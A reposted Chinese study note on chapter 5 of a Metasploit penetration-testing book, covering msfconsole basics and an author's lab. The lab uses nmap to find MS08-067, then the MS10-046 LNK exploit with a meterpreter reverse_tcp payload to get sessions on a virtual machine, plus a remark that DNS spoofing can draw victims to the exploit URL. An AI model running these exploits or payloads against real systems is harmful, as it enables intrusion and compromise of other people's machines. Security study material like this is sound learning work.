Metasploit渗透测试指南读书笔记第五章 - 图文

更新时间:2023-03-18 05:06:01 阅读量: 综合文库 文档下载

说明:文章内容仅供预览,部分内容可能不全。下载后的文档,内容与下面显示的完全一致。下载之前请确认下面内容是否您想要的,是否完整无缺。

唐僧笔记

Metasploit渗透测试指南读书笔记第五章

取经之路技术交流群:161810021

唐僧笔记

第五章渗透攻击之旅 5.1渗透攻击基础

5.1.1 msf > show exploits

这个命令会显示Metasploit框架中所有可有的渗透攻击模块。

5.1.2 msf > show auxiliary

这个命令会显示所有的辅助模块以及它们的用途。在Metasploit中,辅助模块的用途非常广泛,它们可以是扫描器,拒绝服务攻击工具,fuzz测试器,以及其他类型的工具。

5.1.3 msf > show options

参数(options)是保证Metasploit框架中各个模块正确运行所需要的的各种设置。当你选择了一个模块,并输入show options后,会列出各种参数,没选择模块它会列出所有的全局参数

输入back返回到上一个状态

搜索(search),当你不知道模块路径时它就起作用了。

取经之路技术交流群:161810021

唐僧笔记 5.14 msf > show payloads

查看所有的活动状态的攻击载荷

这里我们选择 payload windows/shell/reverse_tcp Reverse_tcp(反弹式tcp连接)

5.15 msf > show targets

列出漏洞影响目标系统的类型。

注:0是自动攻击

取经之路技术交流群:161810021

唐僧笔记

5.1.6 info

使用info命令加上模块的名字来显示此模块的详细信息,参数说明以及所有可用的目标系统。(这没什么用,不多介绍了)

5.1.7 set和unset

模块中参数只有两个状态:已设置(set)或者未设置(unset)。

有些参数被标记为必填项(required)这样的参数必须经过手工设置并处于启用状态。

使用show options命令可用查看那些参数是必填。

使用set命令可以对某个参数进行设置(同时启用改参数) 使用unset命令可以禁用相关参数。

5.1.8 setg和unsetg

这两个命令能够对全局参数进行设置或清除。

5.1.9 save

在使用setg命令对全局参数进行设置后,可以使用save命令将当前的设置保存下来

5.2 你的第一次渗透攻击 第一步扫描,呵呵!

这里全部按照书上来会失败的,看吧!

Traceroute does not support idle or connect scan

不支持连接扫描,但书上确实是这样扫描出来的。

那怎么办了??是不是就放弃了,呵呵!不。这里我们不要进入msf这 个框架扫描,直接在外面扫。

取经之路技术交流群:161810021

唐僧笔记

看见最下面一行么,likely 呵呵! MS08-067: VULNERABLE 这说明存在这个漏洞

下面我们来了解一下那个nmap的参数吧! -

-sT 是指隐秘的TCP连接扫描(Stealth TCP connect) -sS 隐秘的TCP Syn扫描

-A 是指高级的操作系统探测功能(advance OS detection) -PO[protocol list]: IP Protocol Ping 列出开放的端口 --script=smb-check-vulns 调用nmap的插件

既然有漏洞,那我们就来尝试下,看看能不能拿下这台主机吧!

呵呵!知道这是为什么吗??这个刚刚我们保存的(5.1.9时save)

取经之路技术交流群:161810021

唐僧笔记 那我们就简单,设置一下参数吧!

这是参数的设置。

这里应该会不成功,因为我的虚拟机安装的是GHost的系统,它自带了一些补丁,08年的洞,这个补丁应该打上了。

如我预料,看最后一行,不能创建会话,是吧!

这里我拿另外一个漏洞吧!Ms10-046(Microsoft Windows Shell LNK Code Execution),这个可以我试过,呵呵!

不记得了找一下吧!

出来了。

取经之路技术交流群:161810021

唐僧笔记

msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 选择攻击模块

set PAYLOAD windows/meterpreter/reverse_tcp 攻击载荷,这里选择反弹式tcp连接

设置参数,运行攻击。

这个时候只要是有主机打开http://192.168.137.60:80/ 这个地址就有可能挂了。

看吧!打开浏览器输入网址就成了这样了,这说明成功。

取经之路技术交流群:161810021

唐僧笔记

我打开了两下,所有有两个会话。

看见了吧!这个主机挂了。

注:sessions -i 会话的id 这样就进去了。

有的我就没多写了,你们可以打问号就知道参数的意思了。

你可能会问,别人为什么要打开这个Url地址了,不打开不就没事么! 是的,不打开这个网址是没没事。但有一点你一定会打开网站,这点毋庸置疑 是吧!只要你打开网站你就挂了,这里就涉及到了dns欺骗。 Dns欺骗请看这里,我这就不多说了。

http://hi.http://www.wodefanwen.com//???£/blog/item/ae7a88437be09a2bafc3ab3c.html

取经之路技术交流群:161810021

唐僧笔记

5.3 攻击一台Ubuntu主机 这里我就简单的说下,由于我的Ubuntu9.04这个ios文件不知道怎么回事,用不了。所以这个实验就不能做了,不过也不要紧。这个也很简单就是利用一个samba漏洞.

5.4 全端口攻击载荷:暴力猜解目标开放的端口

Metasploit会对所有可能的端口进行尝试,直到他发现其中一个是放行的,不过这么多端口可能要耗费点时间。

这里不知道我没看懂还是怎么回事,感觉没什么啊!书上就是说 LPORT 这个参数没有设置,默认就是1,指所有的端口

取经之路技术交流群:161810021

唐僧笔记

5.5资源文件

资源文件(resource files)是MSF终端内包涵一系列自动化命令的脚本文件。可以在MSF终端中使用resource命令载入资源文件,或者可以在操作系统的命令行环境中使用-r标志将资源文件作为MSF终端的一个参数专递进来运行。

这个感觉没啥用,所以就不做详细的介绍了。

取经之路技术交流群:161810021

本文来源:https://www.bwwdw.com/article/t41f.html

Top